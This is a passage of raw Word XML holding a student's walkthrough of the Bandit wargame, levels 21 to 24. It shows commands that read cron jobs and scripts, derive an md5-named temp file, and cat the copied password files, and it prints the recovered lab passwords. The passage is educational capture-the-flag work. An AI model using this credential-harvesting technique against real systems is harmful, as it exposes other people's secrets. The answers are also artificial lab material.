        <w:t>* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &amp;&gt; /dev/null”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CBD7BE" w14:textId="77777777" w:rsidR="0021576A" w:rsidRDefault="0021576A" w:rsidP="003D711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1DFC3CE0" w14:textId="07DA62C2" w:rsidR="00C63D11" w:rsidRDefault="00A41015" w:rsidP="003D711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It</w:t>
      </w:r>
      <w:r w:rsidR="0021576A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> means</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F871D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0021576A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">commands from /usr/bin/cronjob_bandit22.sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">runs </w:t>
      </w:r>
      <w:r w:rsidR="0021576A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>at startup and every minute</w:t>
      </w:r>
      <w:r w:rsidR="00C625DD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (as user bandit22)</w:t>
      </w:r>
      <w:r w:rsidR="0021576A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>. It also redirects the output to /dev/null.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED37F0" w14:textId="1A879F26" w:rsidR="00F871D5" w:rsidRDefault="00F871D5" w:rsidP="003D7113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604663F3" w14:textId="77777777" w:rsidR="001961C0" w:rsidRDefault="001961C0" w:rsidP="001961C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E255CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>For displaying file context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the file </w:t>
      </w:r>
      <w:r w:rsidR="00F871D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">cronjob_bandit22.sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I used</w:t>
      </w:r>
      <w:r w:rsidR="00F871D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF127AE" w14:textId="032C946A" w:rsidR="00F871D5" w:rsidRDefault="00F871D5" w:rsidP="001961C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F871D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /usr/bin/cronjob_bandit22.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00F871D5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>and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE4ABEB" w14:textId="7A3A315E" w:rsidR="00F871D5" w:rsidRPr="00F871D5" w:rsidRDefault="00F871D5" w:rsidP="00F871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F871D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A45526" w14:textId="77777777" w:rsidR="00F871D5" w:rsidRPr="00F871D5" w:rsidRDefault="00F871D5" w:rsidP="00F871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F871D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029CDD43" w14:textId="734425C5" w:rsidR="00F871D5" w:rsidRDefault="00F871D5" w:rsidP="00F871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F871D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat /etc/bandit_pass/bandit22 &gt; /tmp/</w:t>
      </w:r>
      <w:r w:rsidRPr="001961C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv</w:t>
      </w:r>
      <w:r w:rsidRPr="00F871D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1869F7BF" w14:textId="3452138F" w:rsidR="00F871D5" w:rsidRDefault="00F871D5" w:rsidP="00F871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4BC51F21" w14:textId="49EC0475" w:rsidR="00F871D5" w:rsidRDefault="001961C0" w:rsidP="00F871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It redirects the context of file /etc/bandit_pass/bandit22 (bandit22’s password) to the file /tmp/</w:t>
      </w:r>
      <w:r w:rsidRPr="001961C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001961C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F3F895" w14:textId="08947686" w:rsidR="001961C0" w:rsidRDefault="001961C0" w:rsidP="00F871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759E7DEB" w14:textId="77777777" w:rsidR="001961C0" w:rsidRDefault="001961C0" w:rsidP="001961C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For displaying the next level password, I entered the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4293B90A" w14:textId="2DB904CF" w:rsidR="001961C0" w:rsidRDefault="001961C0" w:rsidP="001961C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F871D5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat /tmp/</w:t>
      </w:r>
      <w:r w:rsidRPr="001961C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">and got the following output: </w:t>
      </w:r>
      <w:r w:rsidRPr="001961C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA4182" w14:textId="74AFE4F3" w:rsidR="00A41015" w:rsidRDefault="00A41015" w:rsidP="001961C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1AEF3E7B" w14:textId="77C607C5" w:rsidR="00A41015" w:rsidRDefault="00A41015" w:rsidP="001961C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A41015">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03251545" w14:textId="0793980E" w:rsidR="00A41015" w:rsidRDefault="004A3174" w:rsidP="001961C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entered the command </w:t>
      </w:r>
      <w:r w:rsidR="00C152CB" w:rsidRPr="00C152CB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /etc/cron.d/cronjob_bandit23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099D8911" w14:textId="271CE490" w:rsidR="004A3174" w:rsidRPr="004A3174" w:rsidRDefault="004A3174" w:rsidP="004A317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A3174">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &amp;&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084F098" w14:textId="49822B02" w:rsidR="004A3174" w:rsidRDefault="004A3174" w:rsidP="004A317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A3174">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &amp;&gt; /dev/null”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B8B7C8" w14:textId="466F3525" w:rsidR="00C152CB" w:rsidRDefault="00C152CB" w:rsidP="004A317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781D1FC0" w14:textId="7A6390D5" w:rsidR="00E2408C" w:rsidRDefault="00C152CB" w:rsidP="004A317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Then, I looked into the file cronjob_bandit23.sh using the command</w:t>
      </w:r>
      <w:r w:rsidR="00C7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33569CD7" w14:textId="5CC7CD55" w:rsidR="00C152CB" w:rsidRDefault="00E2408C" w:rsidP="004A317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E2408C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /usr/bin/cronjob_bandit23.sh, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B6819E" w14:textId="58A6CC9E" w:rsidR="00E2408C" w:rsidRPr="00E2408C" w:rsidRDefault="00E2408C" w:rsidP="00E2408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E2408C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48976609" w14:textId="77777777" w:rsidR="00E2408C" w:rsidRPr="00E2408C" w:rsidRDefault="00E2408C" w:rsidP="00E2408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E2408C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>myname=$(whoami)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD03724" w14:textId="7D2F9722" w:rsidR="00E2408C" w:rsidRPr="00E2408C" w:rsidRDefault="00E2408C" w:rsidP="00E2408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E2408C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A78C04D" w14:textId="6F432000" w:rsidR="00E2408C" w:rsidRPr="00E2408C" w:rsidRDefault="00E2408C" w:rsidP="00E2408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E2408C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B3F561" w14:textId="2074F71B" w:rsidR="00C152CB" w:rsidRDefault="00E2408C" w:rsidP="00E2408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E2408C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat /etc/bandit_pass/$myname &gt; /tmp/$mytarget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42388DEA" w14:textId="0EA93250" w:rsidR="006A4945" w:rsidRDefault="006A4945" w:rsidP="00E2408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0BFBD48C" w14:textId="1D284EDC" w:rsidR="006A4945" w:rsidRDefault="009509E1" w:rsidP="00E2408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** </w:t>
      </w:r>
      <w:r w:rsidR="00220AC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>myname = whoami = bandit2</w:t>
      </w:r>
      <w:r w:rsidR="00C625DD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF0EC92" w14:textId="13797ADA" w:rsidR="00220AC5" w:rsidRDefault="009509E1" w:rsidP="00E2408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** </w:t>
      </w:r>
      <w:r w:rsidR="00220AC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>mytaget = the first word in the output of md5sum(“I am user bandit2</w:t>
      </w:r>
      <w:r w:rsidR="00C625DD">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00220AC5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AD0F2E" w14:textId="0F2C3BF8" w:rsidR="001939B5" w:rsidRDefault="001939B5" w:rsidP="00E2408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3CF34056" w14:textId="0D304AC3" w:rsidR="009509E1" w:rsidRDefault="009509E1" w:rsidP="00E2408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For checking the md5sum result I created a file with the string using the commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7337F0BE" w14:textId="77777777" w:rsidR="009509E1" w:rsidRPr="009509E1" w:rsidRDefault="009509E1" w:rsidP="009509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9509E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>mkdir /tmp/samuelMd5/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B09A10C" w14:textId="35C8CB9C" w:rsidR="009509E1" w:rsidRPr="009509E1" w:rsidRDefault="009509E1" w:rsidP="009509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9509E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>echo "I am user bandit23" &gt; /tmp/samuelMd5/bandit23.file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196606E2" w14:textId="3F1E5927" w:rsidR="009509E1" w:rsidRDefault="009509E1" w:rsidP="00E2408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2F054DEB" w14:textId="41B18DC1" w:rsidR="001939B5" w:rsidRDefault="009509E1" w:rsidP="009509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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">and then I entered the command: </w:t>
      </w:r>
      <w:r w:rsidRPr="009509E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>md5sum /tmp/smuelMd5/bandit23.file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, and got the output: </w:t>
      </w:r>
      <w:r w:rsidRPr="009509E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“8ca319486bfbbc3663ea0fbe81326349  /tmp/samuelMd5/bandit23.file”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5397F942" w14:textId="08423225" w:rsidR="009509E1" w:rsidRDefault="009509E1" w:rsidP="009509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2A171E86" w14:textId="77777777" w:rsidR="009509E1" w:rsidRDefault="009509E1" w:rsidP="009509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For displaying the next level output, I entered the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8A6EC2" w14:textId="589DFA0A" w:rsidR="009509E1" w:rsidRDefault="009509E1" w:rsidP="009509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9509E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /tmp/8ca319486bfbbc3663ea0fbe81326349</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E4386" w14:textId="03779129" w:rsidR="009509E1" w:rsidRDefault="009509E1" w:rsidP="009509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9509E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0871E4" w14:textId="680600CE" w:rsidR="00B36B81" w:rsidRDefault="00B36B81" w:rsidP="009509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4959DBE4" w14:textId="104CAC0F" w:rsidR="00B36B81" w:rsidRDefault="00B36B81" w:rsidP="009509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B36B81">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bandit23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089C9275" w14:textId="438E1E13" w:rsidR="00726B74" w:rsidRPr="00726B74" w:rsidRDefault="00726B74" w:rsidP="00726B7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726B74">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>I entered the command</w:t>
      </w:r>
      <w:r w:rsidRPr="00726B74">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00726B74">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /etc/cron.d/cronjob_bandit24</w:t>
      </w:r>
      <w:r w:rsidRPr="00726B74">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE1413B" w14:textId="3F3D134D" w:rsidR="00726B74" w:rsidRPr="00726B74" w:rsidRDefault="00726B74" w:rsidP="00726B7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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00726B74">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>@reboot bandit24 /usr/bin/cronjob_bandit24.sh &amp;&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5AB7D6" w14:textId="016DDC96" w:rsidR="00726B74" w:rsidRDefault="00726B74" w:rsidP="00726B7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726B74">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &amp;&gt; /dev/null”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB4195E" w14:textId="7B30BB62" w:rsidR="00726B74" w:rsidRDefault="00726B74" w:rsidP="00726B7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4704E7EA" w14:textId="452D0D5B" w:rsidR="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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Then, I looked into the file cronjob_bandit23.sh using the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179194C4" w14:textId="66159090" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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E2408C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>cat /usr/bin/cronjob_bandit2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E2408C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">.sh, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>and got the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E3517A" w14:textId="58B82673" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108242E7" w14:textId="2BA7F959" w:rsidR="00C7426E" w:rsidRPr="00C7426E" w:rsidRDefault="00C7426E" w:rsidP="00C7426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7426E">
        <w:rPr>
